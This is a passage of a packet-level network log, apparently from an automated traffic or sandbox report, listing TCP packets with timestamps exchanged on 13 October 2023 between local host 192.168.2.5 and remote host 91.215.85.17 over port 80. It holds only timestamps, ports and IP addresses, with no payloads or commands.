Oct 13, 2023 15:20:57.565583944 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.565592051 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.565623999 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.565949917 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.565992117 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.566020966 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.566059113 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.566090107 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.566128016 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.566154003 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.566189051 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.566191912 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.566226006 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.566270113 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.566286087 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.566307068 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.566319942 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.566450119 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.566493034 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.566509008 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.566549063 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.566554070 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.566598892 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.566628933 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.566669941 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.566699982 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.566718102 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.566759109 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.566780090 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.566803932 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.566843033 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.566870928 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.566909075 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.566937923 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.566975117 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.566997051 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.567035913 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.567044973 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.567081928 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.567095995 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.567133904 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.567158937 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.567195892 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.567336082 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.567372084 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.567667961 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.567706108 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.568075895 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.568120956 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.568150043 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.568187952 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.568221092 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.568259954 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.568279028 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.568320990 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.568366051 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.568383932 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.568406105 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.568423033 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.568483114 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.568517923 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.568550110 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.568588972 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.568615913 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.568662882 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.568677902 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.568743944 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.568780899 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.568855047 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.568892002 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.569076061 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.569113970 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.569145918 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.569181919 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.569387913 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.569425106 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.569531918 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.569569111 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.569747925 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.569787979 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.569842100 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.569880009 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.569952965 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.569989920 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.570169926 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.570209980 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.570276976 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.570317984 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.570349932 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.570385933 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.570503950 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.570542097 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.570590973 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.570628881 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.570638895 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.570676088 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.570707083 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.570751905 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.570796013 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.570832968 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.570847034 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.570878983 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.570976019 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.571012974 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.571167946 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.571206093 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.571280003 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.571320057 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.571363926 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.571403027 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.571608067 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.571645021 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.571686983 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.571723938 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.571810007 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.571846962 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.571960926 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.571997881 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.572058916 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.572097063 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.572139978 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.572189093 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.572216034 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.572253942 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.572355986 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.572396994 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.572429895 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.572467089 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.572544098 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.572582960 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.572613001 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.572653055 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.572726011 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.572763920 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.572829962 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.572866917 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.572921991 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.572958946 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.573160887 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.573199987 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.573381901 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.573421001 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.573513985 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.573549986 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.573596001 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.573633909 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.573700905 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.573740005 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.573782921 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.573813915 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.573826075 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.573853016 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.573870897 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.573914051 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.573942900 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.573997974 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.574206114 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.574244022 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.574367046 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.574405909 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.574489117 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.574527025 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.574572086 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.574609041 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.574655056 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.574692965 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.574736118 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.574775934 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.574811935 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.574851990 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.574882030 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.574918985 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.574963093 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.575004101 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.575011015 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.575047016 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.575078011 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.575114965 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.575145006 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.575179100 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.575212002 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.575252056 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.575272083 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.575309038 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.575371981 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.575409889 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.575426102 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.575469971 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.575501919 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.575537920 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.575598001 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.575634956 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.575711966 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.575752974 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.575825930 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.575862885 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.575957060 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.575992107 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.576308012 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.576343060 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.576478004 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.576515913 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.576683044 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.576723099 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.576735973 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.576773882 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.576817989 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.576854944 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.577065945 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.577105045 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.577208042 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.577244043 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.577256918 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.577291965 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.577440977 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.577476978 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.577495098 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.577529907 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.577573061 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.577610970 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.577620029 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.577653885 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.577742100 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.577775955 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.577797890 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.577832937 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.577904940 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.577940941 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.578005075 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.578038931 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.578069925 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.578085899 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.578104019 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.578134060 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.578165054 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.578202009 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.578254938 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.578272104 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.578294992 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.578310013 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.578368902 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.578413963 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.578452110 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.578488111 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.578533888 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.578587055 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.578612089 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.578649998 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.578670025 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.578713894 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.578746080 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.578782082 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.578855991 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.578892946 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.578959942 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.578996897 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.579001904 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.579037905 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.579112053 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.579154015 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.579185963 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.579220057 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.579294920 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.579329967 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.579360008 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.579395056 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.579402924 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.579438925 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.579504967 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.579545021 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.579570055 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.579607964 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.579714060 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.579751968 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.579782963 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.579818010 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.579860926 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.579898119 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.580010891 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.580049038 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.580079079 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.580116987 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.580137014 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.580173016 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.580200911 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.580235958 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.580281019 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.580317974 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.580344915 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.580389023 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.580432892 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.580468893 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.580512047 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.580549002 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.580615044 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.580660105 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.580686092 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.580734968 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.580744028 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.580775023 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.580791950 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.580832005 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.580861092 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.580898046 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.580943108 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.580986023 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.581031084 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.581070900 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.581099987 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.581137896 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.581163883 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.581201077 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.581234932 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.581264973 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.581274033 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.581307888 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.581340075 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.581382036 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.581387997 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.581423044 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.581465960 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.581505060 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.581533909 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.581582069 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.581613064 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.581631899 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.581655025 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.581667900 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.581681967 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.581718922 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.581762075 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.581789017 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.581806898 CEST	49721	80	192.168.2.5	91.215.85.17
